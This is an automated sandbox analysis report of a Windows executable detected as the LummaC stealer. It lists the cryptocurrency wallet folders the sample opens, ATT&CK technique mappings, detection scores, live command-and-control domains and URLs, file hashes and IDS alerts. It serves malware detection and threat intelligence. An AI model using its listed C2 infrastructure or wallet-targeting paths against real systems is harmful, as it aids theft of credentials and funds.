Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\CgmaT61.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO			Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO			Jump to behavior

Source: Yara match	File source: 00000000.00000003.1050910887.0000000001696000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1051038294.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CgmaT61.exe PID: 6932, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: CgmaT61.exe PID: 6932, type: MEMORYSTR
Source: Yara match	File source: 0.2.CgmaT61.exe.a40000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	44 Virtualization/Sandbox Evasion	2 OS Credential Dumping	861 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	44 Virtualization/Sandbox Evasion	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	5 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	223 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
CgmaT61.exe	66%	Virustotal		Browse
CgmaT61.exe	63%	ReversingLabs	Win32.Trojan.LummaStealer
CgmaT61.exe	100%	Avira	TR/Crypt.XPACK.Gen

Source	Detection	Scanner	Label
https://begindecafer.world/QwdZdfp	100%	Avira URL Cloud	malware
https://arisechairedd.shop/V?	100%	Avira URL Cloud	malware
https://arisechairedd.shop/JnsHYY	100%	Avira URL Cloud	malware
https://begindecafer.world/QwdZdf	100%	Avira URL Cloud	malware
https://arisechairedd.shop/	100%	Avira URL Cloud	malware
https://arisechairedd.shop/JnsHYg	100%	Avira URL Cloud	malware
https://arisechairedd.shop/JnsHY	100%	Avira URL Cloud	malware
https://arisechairedd.shop/JnsHYmeP	100%	Avira URL Cloud	malware
https://arisechairedd.shop/6?	100%	Avira URL Cloud	malware
https://begindecafer.world/QwdZdfh	100%	Avira URL Cloud	malware
https://arisechairedd.shop/JnsHYf	100%	Avira URL Cloud	malware
https://arisechairedd.shop/n?	100%	Avira URL Cloud	malware
https://arisechairedd.shop/JnsHY(	100%	Avira URL Cloud	malware
https://begindecafer.world/	100%	Avira URL Cloud	malware
https://begindecafer.world:443/QwdZdf	100%	Avira URL Cloud	malware
https://arisechairedd.shop/JnsHY82c	100%	Avira URL Cloud	malware
https://arisechairedd.shop/JnsHYh	100%	Avira URL Cloud	malware
https://arisechairedd.shop/JnsHYID	100%	Avira URL Cloud	malware
https://begindecafer.world/V	100%	Avira URL Cloud	malware
https://arisechairedd.shop/JnsHY?z	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
arisechairedd.shop	104.21.16.1	true	true		unknown
begindecafer.world	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://begindecafer.world/QwdZdf	true	Avira URL Cloud: malware	unknown
https://arisechairedd.shop/JnsHY	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/ac/?q=	CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://arisechairedd.shop/V?	CgmaT61.exe, 00000000.00000003.1116238405.0000000001705000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1099204309.0000000001705000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://begindecafer.world/QwdZdfp	CgmaT61.exe, 00000000.00000002.1158418617.00000000016F1000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi	CgmaT61.exe, 00000000.00000003.1019389828.0000000005D89000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	CgmaT61.exe, 00000000.00000003.1019389828.0000000005D89000.00000004.00000800.00020000.00000000.sdmp	false		high
https://arisechairedd.shop/	CgmaT61.exe, 00000000.00000002.1159657676.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.959101555.0000000001673000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://arisechairedd.shop/JnsHYY	CgmaT61.exe, 00000000.00000003.1098606372.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1157371253.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000002.1158366508.00000000016A9000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	CgmaT61.exe, 00000000.00000003.1019062043.0000000005EAD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44	CgmaT61.exe, 00000000.00000003.1048116190.0000000005D88000.00000004.00000800.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000002.1159657676.0000000005D88000.00000004.00000800.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1098665705.0000000005D81000.00000004.00000800.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1081109394.0000000005D81000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/v20w	CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://arisechairedd.shop/JnsHYmeP	CgmaT61.exe, 00000000.00000003.1116238405.0000000001705000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1099204309.0000000001705000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1116565841.000000000170D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://arisechairedd.shop/JnsHYg	CgmaT61.exe, 00000000.00000002.1158287422.0000000001673000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1157303208.0000000001673000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://begindecafer.world/QwdZdfh	CgmaT61.exe, 00000000.00000002.1158287422.0000000001673000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1157303208.0000000001673000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://arisechairedd.shop/6?	CgmaT61.exe, 00000000.00000002.1158418617.00000000016F1000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://arisechairedd.shop/JnsHYf	CgmaT61.exe, 00000000.00000003.959047272.000000000168B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv20	CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://arisechairedd.shop/JnsHY(	CgmaT61.exe, 00000000.00000003.1017572684.000000000170D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://arisechairedd.shop/JnsHYh	CgmaT61.exe, 00000000.00000003.1116238405.0000000001705000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1077586110.0000000001705000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1099204309.0000000001705000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1077701174.000000000170D000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1048535927.000000000170D000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1116565841.000000000170D000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1017572684.000000000170D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://begindecafer.world/V	CgmaT61.exe, 00000000.00000002.1158418617.00000000016F1000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	CgmaT61.exe, 00000000.00000003.1018093539.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://arisechairedd.shop/n?	CgmaT61.exe, 00000000.00000003.1077586110.0000000001705000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	CgmaT61.exe, 00000000.00000003.1019389828.0000000005D89000.00000004.00000800.00020000.00000000.sdmp	false		high
https://arisechairedd.shop/JnsHY?z	CgmaT61.exe, 00000000.00000002.1158287422.0000000001673000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1157303208.0000000001673000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1116319569.0000000001673000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://arisechairedd.shop/JnsHYID	CgmaT61.exe, 00000000.00000003.1157371253.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000002.1158366508.00000000016A9000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://arisechairedd.shop/JnsHY82c	CgmaT61.exe, 00000000.00000003.1048535927.000000000170D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	CgmaT61.exe, 00000000.00000003.1019062043.0000000005EAD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	CgmaT61.exe, 00000000.00000003.960749697.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begindecafer.world/	CgmaT61.exe, 00000000.00000002.1158418617.00000000016F1000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://begindecafer.world:443/QwdZdf	CgmaT61.exe, 00000000.00000002.1158418617.00000000016F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.16.1	arisechairedd.shop	United States		13335	CLOUDFLARENETUS	true
188.114.97.3	begindecafer.world	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1632116
Start date and time:	2025-03-07 19:44:49 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	CgmaT61.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
13:45:52	API Interceptor	7x Sleep call for process: CgmaT61.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.16.1	Shipping Document.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/6m32/
	Payment Record.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	Invoice Remittance ref27022558.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/a669/
	ujXpculHYDYhc6i.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sss2/five/fre.php
	368c6e62-b031-5b65-fd43-e7a610184138.eml	Get hash	malicious	HTMLPhisher	Browse	ce60771026585.oakdiiocese.org/p/298?session=770558a25b5d1fcbb8d81f113631d430f5b8d022cdc6d97cf6b16a412a3be9e6
	http://orico-rapaciid.xqyrr.cn/eorico/login/	Get hash	malicious	Unknown	Browse	orico-rapaciid.xqyrr.cn/favicon.ico
	Order confirmation.exe	Get hash	malicious	FormBook	Browse	www.englishmaterials.net/3nop/?-Z=cjlpd&Vz=5VQMUr9vdJst/aGqnmtehORilpahgrSgoeoRp4hSLdasMjOC27ijg2BR7Ep4jmwJ4Zkm
	Bank Transfer Accounting Copy.Vbs.vbs	Get hash	malicious	FormBook	Browse	www.fz977.xyz/48bq/
	PO from tpc Type 34.1 34,2 35 Spec.js	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	PO from tpc Type 34.1 34,2 35 Spec 1.js	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
188.114.97.3	CjbMEPJZ3J.exe	Get hash	malicious	FormBook	Browse	www.desktitle.homes/izqs/?8v4Hv=cpKH3h&bnb=znOuwYiaskOFcyM/GsSqn0JEMJbSyMHsSdveYB/23/UFYHNBzQzlITz69DD5sgGZofP3y1oDPTsA91VvhFndYIKmLNl26ZFfZBVczyXjFCmbdDFThg==
	rPO-20429124.exe	Get hash	malicious	FormBook	Browse	www.sld6.rest/q0rl/
	r_BBVA_MensajeSWIFT04-03-2025-PDF.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/50g8/
	https://u.to/8eAUIg	Get hash	malicious	HTMLPhisher	Browse	staemconmmuntiy.com/gift/id=746904
	rRFQ24A.exe	Get hash	malicious	FormBook	Browse	www.sld6.rest/q0rl/
	VibeCall.exe	Get hash	malicious	RHADAMANTHYS	Browse	rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
	VibeCall.exe	Get hash	malicious	RHADAMANTHYS	Browse	rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
	VibeCall.exe	Get hash	malicious	RHADAMANTHYS	Browse	rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
	VibeCall.exe	Get hash	malicious	RHADAMANTHYS	Browse	rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
	WMnMQH4voD.exe	Get hash	malicious	GhostRat	Browse	td49t43g.com/1/t4.bmp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
begindecafer.world	FvbuInU.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	JqGBbm7.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Br6Dejo3eu.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	yM5WEfAX4h.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	LtCPevm69G.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, Vidar	Browse	104.21.32.1
	FvbuInU.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	NEW ORDER (PO. 2100002 (BT-INC).xls	Get hash	malicious	Unknown	Browse	104.26.0.139
	New Order.xls	Get hash	malicious	Unknown	Browse	172.67.68.60
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.0.139
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.1.139
	Doc9078786968795776764567.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.0.139
	NEW ORDER (PO. 2100002 (BT-INC).xls	Get hash	malicious	Unknown	Browse	104.26.0.139
	New Order.xls	Get hash	malicious	Unknown	Browse	104.26.1.139
CLOUDFLARENETUS	yM5WEfAX4h.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	LtCPevm69G.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, Vidar	Browse	104.21.32.1
	FvbuInU.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	NEW ORDER (PO. 2100002 (BT-INC).xls	Get hash	malicious	Unknown	Browse	104.26.0.139
	New Order.xls	Get hash	malicious	Unknown	Browse	172.67.68.60
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.0.139
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.1.139
	Doc9078786968795776764567.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.0.139
	NEW ORDER (PO. 2100002 (BT-INC).xls	Get hash	malicious	Unknown	Browse	104.26.0.139
	New Order.xls	Get hash	malicious	Unknown	Browse	104.26.1.139

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	LtCPevm69G.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, Vidar	Browse	188.114.97.3 104.21.16.1
	FvbuInU.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3 104.21.16.1
	NEW ORDER (PO. 2100002 (BT-INC).xls	Get hash	malicious	Unknown	Browse	188.114.97.3 104.21.16.1
	New Order.xls	Get hash	malicious	Unknown	Browse	188.114.97.3 104.21.16.1
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3 104.21.16.1
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3 104.21.16.1
	Doc9078786968795776764567.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3 104.21.16.1
	JqGBbm7.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3 104.21.16.1
	NEW ORDER (PO. 2100002 (BT-INC).xls	Get hash	malicious	Unknown	Browse	188.114.97.3 104.21.16.1
	New Order.xls	Get hash	malicious	Unknown	Browse	188.114.97.3 104.21.16.1

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.906441447816085
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CgmaT61.exe
File size:	2'067'968 bytes
MD5:	a62fe491673f0de54e959defbfebd0dd
SHA1:	f13d65052656ed323b8b2fca8d90131f564b44dd
SHA256:	936d17e301a6f5b6878b1a6f46a215d5af02d8254c65dc64a8679f7b2ff25213
SHA512:	4d0ab58f4cd009a48b0bfccc4a3b2163e596db17c5fed2f88b969b752e0704234130377ad7c5488b406a21b51560ec6017609e3f5063771d00a610c2db6f9129
SSDEEP:	49152:2XgU4282P9ies0OHGdQJXu3dUM1SqM5L:2Q07QniQNuv1SqYL
TLSH:	18A5229506BB283DE37B86B89AD87C4BB01743D241E2687CF9100A9FC631BE8777945D
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.............................pI...........@...........................I...........@.................................W...k..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x897000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67C9DDEB [Thu Mar 6 17:39:55 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FD32CB3032Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x61057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x60000	0x1f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x611f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x5f000	0x5f000	a562634c7ab0f93869a0c2630fd5d5ff	False	0.5996993215460527	data	7.169833059547756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x60000	0x1f0	0x200	f6419fd05eae29226cf95adc1d9a1360	False	0.62890625	data	4.956108062975839	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x61000	0x1000	0x200	f47b289bcee0e13a937cc29db13607bf	False	0.150390625	data	1.0437720338377494	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x62000	0x29d000	0x200	ae85a02f28cca85cfe34c24f44148549	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mzhehwmc	0x2ff000	0x197000	0x196200	b56c86760df5b4ac8cfbd60cf1941481	False	0.9941881155740228	data	7.953537250716954	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
roelxloa	0x496000	0x1000	0x400	08a756062b4faaeebe89539330ce6906	False	0.7568359375	data	5.951221092013547	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x497000	0x3000	0x2200	3e80206629a72eb521c909ef014c2bce	False	0.06767003676470588	DOS executable (COM)	0.8051051143261414	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x494f80	0x198	ASCII text, with CRLF line terminators			0.5833333333333334

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-07T19:45:53.043159+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49682	104.21.16.1	443	TCP
2025-03-07T19:45:55.841399+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49683	104.21.16.1	443	TCP
2025-03-07T19:45:58.716295+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49684	104.21.16.1	443	TCP
2025-03-07T19:46:01.841356+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49685	104.21.16.1	443	TCP
2025-03-07T19:46:04.918378+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49686	104.21.16.1	443	TCP
2025-03-07T19:46:07.920024+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49687	104.21.16.1	443	TCP
2025-03-07T19:46:11.156472+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49688	104.21.16.1	443	TCP
2025-03-07T19:46:12.965778+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49689	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 19:45:51.235954046 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:51.235997915 CET	443	49682	104.21.16.1	192.168.2.8
